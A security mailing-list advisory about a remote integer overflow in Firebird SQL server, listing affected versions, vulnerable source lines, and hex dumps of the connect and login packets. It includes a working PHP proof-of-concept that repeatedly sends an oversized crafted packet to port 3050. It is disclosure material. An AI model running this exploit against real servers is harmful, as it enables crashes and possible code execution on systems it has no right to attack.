[EXPL] Firebird Integer Overflow (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Firebird Integer Overflow (Exploit)
------------------------------------------------------------------------


SUMMARY

<http://www.firebirdsql.org/> Firebird is "a relational database offering
many ANSI SQL-92 features that runs on Linux, Windows, and a variety of
Unix platforms". A vulnerability in Firebird allows remote attackers to
cause the server to overflow an internal buffer by causing it to overflow
the value of an integer.

DETAILS

Vulnerable Systems:
* Firebird SQL version 1.0.3 and before.
* Firebird SQL version 1.5.5 and before.
* Firebird SQL version 2.0.3 and before.
* Firebird SQL version 2.1.0 Beta 2 and before.

Immune Systems:
* Firebird SQL version 1.5.6 (to be released)
* Firebird SQL version 2.0.4 (to be released)
* Firebird SQL version 2.1.0 RC1


Exploit:
/**
* FIREBIRD REMOTE BUFFER OVERFLOW.
* ITDEFENCE.ru Proof-of-Concept (POC)
* Eugene Minaev (underwater@xxxxxxxxxxxx)
*
* Integer overflow in Firebird SQL 1.0.3 and earlier, 1.5.x before
1.5.6, 2.0.x before 2.0.4, and 2.1.x before 2.1.0
* RC1 might allow remote attackers to execute arbitrary code via crafted
op_receive, op_start, op_start_and_receive,
* op_send, (5) op_start_and_send, and (6) op_start_send_and_receive XDR
requests, which triggers memory corruption.
*
* Vulnerable packages
*
* Firebird SQL 1.0.3 and before.
* Firebird SQL 1.5.5 and before.
* Firebird SQL 2.0.3 and before.
* Firebird SQL 2.1.0 Beta 2 and before.
*
* Non-vulnerable packages
*
* Firebird SQL 1.5.6 (to be released)
* Firebird SQL 2.0.4 (to be released)
* Firebird SQL 2.1.0 RC1
*
* src/remote/protocol.cpp:417
*
* MAP(xdr_short, reinterpret_cast<SSHORT&>(data->p_data_request));
* MAP(xdr_short,
reinterpret_cast<SSHORT&>(data->p_data_incarnation));
* MAP(xdr_short,
reinterpret_cast<SSHORT&>(data->p_data_transaction));
* MAP(xdr_short,
reinterpret_cast<SSHORT&>(data->p_data_message_number));
* return xdr_request(xdrs, data->p_data_request,
* data->p_data_message_number,
* data->p_data_incarnation) ? P_TRUE(xdrs, p) : P_FALSE(xdrs,
p);
*
* Firebird Connect Packet
*
* 0x0000 00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00
.............E.
* 0x0010 00 BC 00 00 00 00 40 06-00 25 C0 A8 7C 63 C0 A8
&#1112;....@..%&#1040;&#1025;|c&#1040;&#1025;
* 0x0020 7C 63 0B EA 0E 94 00 00-00 01 00 00 00 01 50 10 |c.&#1082;.
.......P.
* 0x0030 40 00 00 00 00 00 00 00-00 01 00 00 00 13 00 00
@...............
* 0x0040 00 02 00 00 00 1D 00 00-00 3C 43 3A 5C 50 72 6F
........<C:\Pro
* 0x0050 67 72 61 6D 20 46 69 6C-65 73 5C 46 69 72 65 62 gram
Files\Fireb
* 0x0060 69 72 64 5C 46 69 72 65-62 69 72 64 5F 31 5F 35
ird\Firebird_1_5
* 0x0070 5C 65 78 61 6D 70 6C 65-73 5C 45 4D 50 4C 4F 59
\examples\EMPLOY
* 0x0080 45 45 2E 66 64 62 00 00-00 02 00 00 00 13 01 04
EE.fdb..........
* 0x0090 52 4F 4F 54 04 09 75 6E-64 65 72 77 68 61 74 06
ROOT..underwhat.
* 0x00A0 00 00 00 00 00 08 00 00-00 01 00 00 00 02 00 00
...............
* 0x00B0 00 03 00 00 00 02 00 00-00 0A 00 00 00 01 00 00
...............
* 0x00C0 00 02 00 00 00 03 00 00-00 04 ..........
*
* Firebird Login Packet.
*
* 0x0000 00 00 00 00 00 02 00 00-00 00 00 01 08 00 45 00
.............E.
* 0x0010 00 94 00 00 6C 6C 40 06-93 E0 C0 A8 7C 63 C0 A8 .
.ll@.?&#1072;&#1040;&#1025;|c&#1040;&#1025;
* 0x0020 7C 63 0B EA 0E 94 00 00-00 95 00 00 00 11 50 10 |c.&#1082;.
.. ....P.
* 0x0030 40 00 00 00 00 00 00 00-00 13 00 00 00 00 00 00
@...............
* 0x0040 00 3C 43 3A 5C 50 72 6F-67 72 61 6D 20 46 69 6C
<C:\Program Fil
* 0x0050 65 73 5C 46 69 72 65 62-69 72 64 5C 46 69 72 65
es\Firebird\Fire
* 0x0060 62 69 72 64 5F 31 5F 35-5C 65 78 61 6D 70 6C 65
bird_1_5\example
* 0x0070 73 5C 45 4D 50 4C 4F 59-45 45 2E 66 64 62 00 00
s\EMPLOYEE.fdb..
* 0x0080 00 1E 01 1C 06 53 59 53-44 42 41 1E 0B 51 50 33
....SYSDBA..QP3
* 0x0090 4C 4D 5A 2F 4D 4A 68 2E-3A 04 00 00 00 00 3E 00
LMZ/MJh.:.....>.
* 0x00A0 00 00 ..
*
*/

$___suntzu = "\x00\x00\x00\x4a" . str_repeat( "\x4a" , 3000);
for ($temp = 0; $temp < 5; $temp ++){
$___zuntzu = fsockopen('192.168.124.99',3050);
fwrite($___zuntzu , $___suntzu);
fclose($___zuntzu );
sleep(1);
}

?>


ADDITIONAL INFORMATION

The information has been provided by <mailto:underwater@xxxxxxxxxxxx>
Eugene Minaev.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.